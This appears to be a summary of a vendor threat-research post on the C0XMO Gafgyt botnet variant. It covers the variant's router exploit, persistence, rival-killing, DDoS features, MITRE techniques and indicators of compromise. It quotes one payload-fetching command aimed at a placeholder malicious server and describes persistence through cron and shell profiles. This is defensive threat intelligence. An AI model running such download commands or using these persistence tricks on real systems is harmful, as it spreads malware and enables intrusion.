Inside the Cross-Platform Propagation of a New Gafgyt Variant C0XMO

FortiGuard Labs analyzed C0XMO, a modular Gafgyt botnet variant that exploits CVE-2021-27137 on vulnerable DD-WRT routers and uses a separate Python scanner to expand infections across Linux and IoT devices. The malware adds persistence, kills competing botnets, performs a custom C2 handshake, and supports many DDoS and exploitation capabilities targeting services such as Telnet, SSH, UPnP, ADB, and multiple HTTP vulnerabilities. #C0XMO #Gafgyt #CVE-2021-27137 #DDWRT

Key points

  • C0XMO is a new Gafgyt botnet variant discovered by FortiGuard Labs in March.
  • It spreads by exploiting CVE-2021-27137 in the UPnP service of vulnerable DD-WRT firmware.
  • Unlike earlier versions, its lateral movement is separated into a standalone Python scanner script.
  • The malware supports persistence through self-copying, cron jobs, shell profile modification, and re-execution.
  • C0XMO kills competing processes and removes rival botnets along with their persistence mechanisms.
  • It uses a custom C2 handshake and supports multiple attack commands, including 19 DDoS methods.
  • The scanner performs brute-force login attempts and HTTP/ADB exploitation to deploy the payload across many architectures.

MITRE Techniques

  • [T1068] Exploitation for Privilege Escalation – The bot is delivered by exploiting a router firmware vulnerability in the UPnP service (‘the threat actor delivered the malware by exploiting CVE-2021-27137’).
  • [T1053.003] Scheduled Task/Job: Cron – C0XMO creates cron jobs to relaunch itself every 15 minutes (‘The malware then creates cron jobs to run C0XMO every 15 minutes’).
  • [T1547.001] Boot or Logon Autostart Execution: Shell Profile Modification – It appends execution commands to shell startup files for persistence (‘C0XMO appends execution commands to multiple shell profile files such as ~/.profile, ~/.bashrc, and ~/.bash_profile’).
  • [T1036] Masquerading – The malware copies itself to hidden-looking filenames and paths to blend in (‘generates multiple hidden file paths, including /tmp/.sys, /var/tmp/.sys, and /dev/shm/.sys’).
  • [T1027] Obfuscated Files or Information – The bot uses hexadecimal strings and encoded handshake values during C2 communication (‘sends the hexadecimal sequence FF FF FF FF 75 as the final magic value’).
  • [T1071.001] Application Layer Protocol: Web Protocols – The scanner downloads scripts and communicates via HTTP to fetch payloads and components (‘wget -q http://malicious[.]server/bot.arch’).
  • [T1110.001] Brute Force: Password Guessing – The scanner performs weak-credential attacks against Telnet and SSH (‘weak password brute-force attacks on Telnet and SSH services’).
  • [T1021.004] Remote Services: SSH – The scanner targets SSH for brute-force login and payload delivery (‘SSH weak-credential login’).
  • [T1021.001] Remote Services: Telnet – The scanner targets Telnet for weak-credential login and deployment (‘Telnet weak-credential login’).
  • [T1210] Exploitation of Remote Services – The scanner uses multiple HTTP-based and ADB exploits to gain initial access (‘HTTP-based exploitation used to achieve initial access’ and ‘exploits unauthorized access vulnerabilities in the Android Debug Bridge (ADB)’).
  • [T1499] Endpoint Denial of Service – C0XMO supports many DDoS attack methods such as SYN flood, HTTP flood, and amplification attacks (‘supports 19 different DDoS attack methods’).
  • [T1059.006] Command and Scripting Interpreter: Python – The lateral movement/scanning capability is isolated into a Python script (‘the malware separates its lateral movement into a standalone Python script’).
  • [T1485] Data Destruction – The malware deletes competitor binaries and associated files (‘deletes the corresponding file from the system’).

Indicators of Compromise

  • [IP address] C2 and distribution infrastructure – 85[.]215[.]131[.]70, 217[.]160[.]125[.]125:15527
  • [File path] Downloaded and dropped malware location – /tmp/.cache, /tmp/.sys, /var/tmp/.sys, and other hidden paths
  • [File name] Scanner and payload artifacts – scanner.py, .cache
  • [SHA-256 hash] Reported C0XMO sample – 444a9d34a9f59dc7975dfabefb47d789813a4497bbac9127c4806dd816e85211
  • [URL] Payload and script download source – http://malicious[.]server/bot.arch


Read more: https://feeds.fortinet.com/~/957685901/0/fortinet/blog/threat-research~Inside-the-CrossPlatform-Propagation-of-a-New-Gafgyt-Variant-CXMO